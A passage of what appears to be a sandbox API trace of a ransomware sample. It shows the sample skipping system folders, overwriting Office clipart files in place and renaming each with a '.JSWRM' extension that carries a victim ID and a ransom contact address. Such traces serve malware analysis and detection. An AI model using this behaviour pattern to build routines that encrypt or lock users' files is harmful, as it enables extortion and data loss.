lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0076.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.862] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10562) returned 1 [0076.862] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2940) returned 0x24d210 [0076.862] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2940, lpOverlapped=0x0) returned 1 [0076.864] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.864] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2940, lpOverlapped=0x0) returned 1 [0076.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.864] CloseHandle (hObject=0x314) returned 1 [0076.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0076.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0076.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0076.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0076.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0076.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0076.865] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ee, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FALL_01.MID", cAlternateFileName="")) returned 1 [0076.865] lstrcmpiW (lpString1="FALL_01.MID", lpString2=".") returned 1 [0076.865] lstrcmpiW (lpString1="FALL_01.MID", lpString2="..") returned 1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="...") returned 1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="windows") returned -1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="recovery") returned -1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="perflogs") returned -1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="documents and settings") returned 1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="system volume information") returned -1 [0076.866] lstrcmpiW (lpString1="FALL_01.MID", lpString2="msocache") returned -1 [0076.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FALL_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FALL_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FALL_01.MID", lpUsedDefaultChar=0x0) returned 11 [0076.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0076.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FALL_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FALL_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FALL_01.MID", lpUsedDefaultChar=0x0) returned 11 [0076.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0076.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0076.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0076.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.866] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4846) returned 1 [0076.866] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12e0) returned 0x205850 [0076.866] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12e0, lpOverlapped=0x0) returned 1 [0076.969] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.969] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12e0, lpOverlapped=0x0) returned 1 [0076.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0076.970] CloseHandle (hObject=0x314) returned 1 [0076.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0076.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0076.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0076.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0076.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0076.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.970] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0076.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0076.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0076.971] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00074_.WMF", cAlternateFileName="")) returned 1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2=".") returned 1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="..") returned 1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="...") returned 1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="windows") returned -1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="recovery") returned -1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="perflogs") returned -1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="documents and settings") returned 1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="system volume information") returned -1 [0076.971] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="msocache") returned -1 [0076.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00074_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00074_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00074_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00074_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00074_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00074_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0076.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0076.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0076.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.973] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17850) returned 1 [0076.973] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x45b0) returned 0x24d210 [0076.973] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x45b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x45b0, lpOverlapped=0x0) returned 1 [0076.975] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.975] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x45b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x45b0, lpOverlapped=0x0) returned 1 [0076.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.976] CloseHandle (hObject=0x314) returned 1 [0076.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0076.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0076.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0076.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0076.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0076.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0076.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0076.977] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eda, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00076_.WMF", cAlternateFileName="")) returned 1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2=".") returned 1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="..") returned 1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="...") returned 1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="windows") returned -1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="recovery") returned -1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="perflogs") returned -1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="documents and settings") returned 1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="system volume information") returned -1 [0076.977] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="msocache") returned -1 [0076.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0076.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00076_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00076_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00076_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0076.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0076.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00076_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00076_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00076_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0076.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0076.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0076.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0076.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.978] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11994) returned 1 [0076.978] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ed0) returned 0x24d210 [0076.978] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ed0, lpOverlapped=0x0) returned 1 [0076.980] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.980] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ed0, lpOverlapped=0x0) returned 1 [0076.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.980] CloseHandle (hObject=0x314) returned 1 [0076.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 